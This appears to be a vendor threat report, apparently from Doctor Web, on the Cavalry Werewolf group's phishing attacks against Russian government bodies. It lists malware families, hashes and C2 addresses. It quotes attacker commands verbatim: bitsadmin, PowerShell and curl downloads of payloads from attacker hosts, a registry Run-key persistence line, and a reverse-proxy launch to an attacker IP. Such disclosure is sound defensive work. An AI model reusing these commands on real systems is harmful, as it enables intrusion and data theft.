Cavalry Werewolf hacker group attacks Russian state institutions

Real-time threat news | Hot news | All the news

November 6, 2025

Introduction

In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. This hypothesis derived from the fact that spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data.

During the examination, our experts successfully identified previously unknown malware, including open-source tools. Among them were various backdoors that allow commands to be executed remotely on attacked systems and the background to be prepared for reconnaissance and further anchoring into the network infrastructure.

In this study, we will discuss the Cavalry Werewolf tools that we discovered and consider the features of this hacker group and the typical actions that these cybercriminals perform in compromised networks.

General information about the attack and the tools involved

To gain initial access to one of the computers, the threat actors utilized a common attack vector: phishing emails with malware disguised as documents attached. In this particular case, the messages contained BackDoor.ShellNET.1, a backdoor that was unknown at the time of the attack. This malware is based on Reverse-Shell-CS open-source software. It allows infected systems to be connected to remotely via a reverse shell and commands to be executed. This backdoor was located in a password-protected archive and had different names, depending on the particular phishing campaign involved.

Name variants for BackDoor.ShellNET.1
Службеная записка от 16.06.2025___________________________.exe
О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe
О проведении личного приема граждан список участников.exe
О работе почтового сервера план и проведенная работа.exe

An example of a phishing email containing BackDoor.ShellNET.1. The attackers offer the potential victim a “document” to read and provide a password that can be used to unpack the archive

Using BackDoor.ShellNET.1, the threat actors continued to get anchored into the target system. They downloaded several malicious apps through the standard Windows tool Bitsadmin (C:\Windows\SysWOW64\bitsadmin.exe)—for managing file transfer tasks. This program was launched with a set of certain command-line keys and on behalf of the current system administrator, as shown in the example below:

cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe

The first threat downloaded with BackDoor.ShellNET.1 was the Trojan.FileSpyNET.5 trojan stealer. The cybercriminals used it to download documents stored on the computer in .doc, .docx, .xlsx, and .pdf formats; text files (.txt); and images (.jpg, .png).

Next, the attackers installed BackDoor.Tunnel.41 (backdoor malware that is ReverseSocks5 open-source software) to create SOCKS5 tunnels and inconspicuously connect to the computer in order to then execute commands on it, including one permitting the installation of other malware.

Cavalry Werewolf tools

Our investigation into this incident allowed us to uncover not only the aforementioned malware, but also many other of this criminal group’s tools that hackers use to carry out targeted attacks. It should be noted that Cavalry Werewolf malware creators do not limit themselves to a single set of malicious apps and are constantly expanding their arsenal. For this reason, the tools for penetrating target systems can vary, as can the next stages in the infection chain, depending on which institution is being attacked.

The entry point

Malicious programs in Cavalry Werewolf’s phishing emails are the first stage in the infection chain. At the same time, they can be represented by different malware types. Doctor Web’s virus analysts identified the following variants:

BAT.DownLoader.1138

This is a batch file that downloads PowerShell.BackDoor.109, PowerShell backdoor malware, into the target system. With its help, the threat actors download and run other malware on the computer.

Known file names for BAT.DownLoader.1138 SHA1 hash С2 server
scan26_08_2025.bat d2106c8dfd0c681c27483a21cc72d746b2e5c18c 168[.]100.10[.]73

Trojan.Packed2.49708

This trojan installs the BackDoor.Spy.4033 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Known file names for Trojan.Packed2.49708 SHA1 hash С2 server
О проведении личного приема граждан список участников план и проведенная работа.exe

C:\Windows\2o1nzu.exe
5684972ded765b0b08b290c85c8fac8ed3fea273 185[.]173.37[.]67
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe 29ee3910d05e248cfb3ff62bd2e85e9c76db44a5 185[.]231.155[.]111
О работе почтового сервера план и проведенная работа.exe

Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe

План-протокол встречи о сотрудничестве представителей должн.лиц.exe
ce4912e5cd46fae58916c9ed49459c9232955302 109[.]172.85[.]95
C:\Windows\746wljxfs.exe 653ffc8c3ec85c6210a416b92d828a28b2353c17 185[.]173.37[.]67
b52e1c9484ab694720dc62d501deca2aa922a078 109[.]172.85[.]95

Trojan.Siggen31.54011

This trojan installs the BackDoor.Spy.4038 malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.

Functionality-wise, Trojan.Siggen31.54011 is similar to the Trojan.Packed2.49708 malware, but it has a slightly different payload-extraction algorithm.

SHA1 hash С2 server
baab225a50502a156222fcc234a87c09bc2b1647 109[.]172.85[.]63
93000d43d5c54b07b52efbdad3012e232bdb49cc 109[.]172.85[.]63

BackDoor.Siggen2.5463

This backdoor executes tasks received from the attackers and is controlled via a Telegram bot. The main functionality of this malware is located in the PowerShell code hidden in its body.

Known file names for BackDoor.Siggen2.5463 SHA1 hash The payload
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe

system.exe
c96beb026dc871256e86eca01e1f5ba2247a0df6 PowerShell.BackDoor.108

BackDoor.RShell.169

This backdoor allows malicious actors to remotely connect to infected computers via a reverse shell to execute various commands.

Known file names for BackDoor.RShell.169 SHA1 hash С2 server
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe

Информация по письму в МИД от 6 июля статус и прилагаемые документы.exe
633885f16ef1e848a2e057169ab45d363f3f8c57 109[.]172.85[.]63

BackDoor.ReverseShell.10

This backdoor enables a reverse shell and gives threat actors remote access to the system.

Known file names for BackDoor.ReverseShell.10 SHA1 hash С2 server
к проектам.exe

Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
dd98dcf6807a7281e102307d61c71b7954b93032 195[.]2.78[.]133
Служебная записка от 20.08.2025                                                                      .exe

Служебная записка от 12.08.2025                                                                      .exe

f546861adc7c8ca88e3b302d274e6fffb63de9b0 62[.]113.114[.]209

The next infection stages

We have uncovered the following malicious programs that can be installed on infected devices after they have been compromised:

Trojan.Inject5.57968

This is a trojan app with a backdoor encrypted in its body. This backdoor allows the attackers to download malicious programs on the infected computer. The payload is decrypted in several steps. In one of them, a malicious data array is injected into the process of the aspnet_compiler.exe program, which is part of the Microsoft .NET Framework package. Eventually, the completely decrypted backdoor operates in the context of this legitimate app’s process.

Studying Trojan.Inject5.57968’s activity, using the “sandbox” of the Dr.Web vxCube interactive threat analyzer

Known file names for Trojan.Inject5.57968 SHA1 hash С2 server The payload
pickmum1.exe e840c521ec436915da71eb9b0cfd56990f4e53e5 64[.]95.11[.]202 Trojan.PackedNET.3351
mummyfile1.exe 22641dea0dbe58e71f93615c208610f79d661228 64[.]95.11[.]202 Trojan.PackedNET.3351

BackDoor.ShellNET.2

A backdoor that is controlled via a Telegram bot and executes the attackers’ commands.

Known file names for BackDoor.ShellNET.2 SHA1 hash
win.exe 1957fb36537df5d1a29fb7383bc7cde00cd88c77

BackDoor.ReverseProxy.1

A backdoor based on the ReverseSocks5 open-source software. It enables a SOCKS5 proxy in the infected system to provide remote access to the computer. BackDoor.ReverseProxy.1 is launched via the command interpreter cmd.exe with the parameter -connect IP to connect to the target address. There are modifications of this backdoor with hardcoded addresses.

The following IPs have been detected:

  • 78[.]128.112[.]209 (specified in the launching command)
  • 96[.]9.125[.]168 (specified in the launching command)
  • 188[.]127.231[.]136 (hardcoded in the code)
Known file names for BackDoor.ReverseProxy.1 SHA1 hash
revv2.exe 6ec8a10a71518563e012f4d24499b12586128c55

Trojan.Packed2.49862

Trojan.Packed2.49862 is the detection name for the trojan versions of legitimate programs in which the attackers have implanted malicious code. Doctor Web’s malware analysts encountered malicious modifications of the WinRar and 7-Zip archivers, the Visual Studio Code development tool, AkelPad text-editing software, and some other apps. Among them, for instance, was the Sumatra PDF Reader program which the cybercriminals passed off as MAX messenger. Such modifications are no longer able to carry out their main functionality and, when launched, can only initialize the implanted trojan component.

Depending on the cybercriminals’ goals, these modifications can carry all sorts of malware. Among them are:

Known file names for Trojan.Packed2.49862 SHA1 hash С2 server The payload
code.exe
rev2.exe
8279ad4a8ad20bf7bbca0fc54428d6cdc136b776 188[.]127.231[.]136 BackDoor.ReverseProxy.1
code.exe
revv.exe
a2326011368d994e99509388cb3dc132d7c2053f 192[.]168.11[.]10 BackDoor.ReverseProxy.1
7zr.exe
winload.exe
system.exe
Recorded_TV.exe
451cfa10538bc572d9fd3d09758eb945ac1b9437 77[.]232.42[.]107 BackDoor.Shell.275
Command line RAR
winlock.exe
Recorded_TV.exe
a5e7e75ee5c0fb82e4dc2f7617c1fe3240f21db2 77[.]232.42[.]107 BackDoor.AdaptixC2.11
winsrv.exe
firefox.exe
bbe3a5ef79e996d9411c8320b879c5e31369921e 94[.]198.52[.]210 BackDoor.AdaptixC2.11
AkelPad.exe e8ab26b3141fbb410522b2cbabdc7e00a9a55251 78[.]128.112[.]209 BackDoor.Havoc.16
7z.exe dcd374105a5542ef5100f6034c805878153b1205 192[.]168.88[.]104 BackDoor.Meterpreter.227
7z.exe e51a65f50b8bb3abf1b7f2f9217a24acfb3de618 192[.]168.1[.]157 Trojan.Siggen9.56514
7z.exe
chromedriver.exe
d2a7bcbf908507af3d7d3b0ae9dbaadd141810a4 Telegram bot Trojan.Clipper.808
7z
7z.exe
svc_host.exe
dzveo09ww.exe
c89c1ed4b6dda8a00af54a0ab6dca0630eb45d81 Telegram bot Trojan.Clipper.808
b05c5fe8b206fb0d168f3a1fc91b0ed548eb46f5 Telegram bot Trojan.Clipper.808
max - для бизнеса.exe b4d0d2bbcfc5a52ed8b05c756cfbfa96838af231 89[.]22.161[.]133 BackDoor.Havoc.16

Typical actions performed by this group in a compromised network

Once the attackers penetrate the target organization’s computer infrastructure, they can perform various actions involving data collection and getting further anchored into the system.

To collect information about the infected computer, they execute these commands:

  • whoami — to get information about the current user;
  • dir C:\\users\\<user>\\Downloads — to get the list of files located in the “Downloads” directory of the current user;
  • dir C:\\users\\public\\pictures\\ — to get the list of files in the “Pictures” directory from a shared catalog (in order to determine which malicious programs have already been downloaded into the system);
  • ipconfig /all — to get the network configuration;
  • net user — to get a list of all of the users in the system.

They use the following commands to collect information about the proxy server and to check the network’s functionality:

  • powershell -c '[System.Net.WebRequest]::DefaultWebProxy.GetProxy(\"https://google.com\")'
  • curl -I https://google.com
  • curl -I https://google.com -x <proxy>

To configure the network, they use:

  • a command-line tool netsh, which is included in the Windows OS.

To subsequently deliver malicious tools into the system, they use legitimate tools:

  • PowerShell (for example: powershell -Command Invoke-WebRequest -Uri \"hxxps[:]//sss[.]qwadx[.]com/revv3.exe\" -OutFile \"C:\\users\\public\\pictures\\rev.exe);
  • Bitsadmin (for example: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/rever.exe C:\\users\\public\\pictures\\rev3.exe);
  • curl (for example: curl -o C:\\users\\public\\pictures\\rev.exe hxxp[:]//195[.]2.79[.]245/code.exe);

To get anchored in the system:

  • They can modify the Windows registry (for example: REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Service /t REG_SZ /d C:\\users\\public\\pictures\\win.exe /f).

They use the command-line interpreter cmd.exe to launch their tool. For example:

  • C:\\users\\public\\libraries\\revv2.exe -connect 78[.]128.112[.]209:10443 — to launch BackDoor.ReverseProxy.1;
  • C:\\users\\public\\pictures\\732.exe — to launch BackDoor.Tunnel.41.

They can use PowerShell to delete their tools. For example:

  • powershell -Command Remove-Item C:\\users\\public\\pictures\\732.exe

Threat actors can also periodically check whether C2 servers are available, using the command ping.

Features of the Cavalry Werewolf hacker group

The following features of the Cavalry Werewolf hacker group can be highlighted:

  • they prefer using open-source software, both in its original form and as the basis for developing their own tools;
  • their main tools are various reverse-shell backdoors that allow commands to be executed remotely in infected systems;
  • they can embed malicious code into initially harmless programs;
  • they often use the Telegram API to control infected computers;
  • they use compromised email addresses and carry out phishing campaigns, sending emails under the guise of state institutions to distribute the first infection stage;
  • they use directories C:\\users\\public\\pictures, C:\\users\\public\\libraries, and C:\\users\\public\\downloads to download subsequent infection stages to the target device.

For detailed technical descriptions of identified Cavalry Werewolf tools, please refer to the PDF version of the study or visit the Doctor Web virus library.

More details about BackDoor.ReverseProxy.1
More details about BackDoor.ReverseShell.10
More details about BackDoor.RShell.169
More details about BackDoor.ShellNET.1
More details about BackDoor.ShellNET.2
More details about BackDoor.Siggen2.5463
More details about BackDoor.Tunnel.41
More details about BAT.DownLoader.1138
More details about Trojan.Siggen31.54011
More details about Trojan.Clipper.808
More details about Trojan.FileSpyNET.5
More details about Trojan.Inject5.57968
More details about Trojan.Packed2.49708
More details about Trojan.Packed2.49862

MITRE matrix

Stage Technique
Initial access Spearphishing attachment (T1566.001)
Execution User execution (T1204)

PowerShell (T1059.001)

Windows Command Shell (T1059.003)
Persistence Registry Run Keys / Startup Folder (T1547.001)

BITS Jobs (T1197)
Privilege Escalation Bypass User Account Control (T1548.002)
Defense Evasion BITS Jobs (T1197)
Command and Control External Proxy (T1090.002)

Bidirectional Communication (T1102.002)
Exfiltration Exfiltration Over C2 Channel (T1041)

Exfiltration Over Web Service (T1567)
Indicators of compromise
0
Latest All news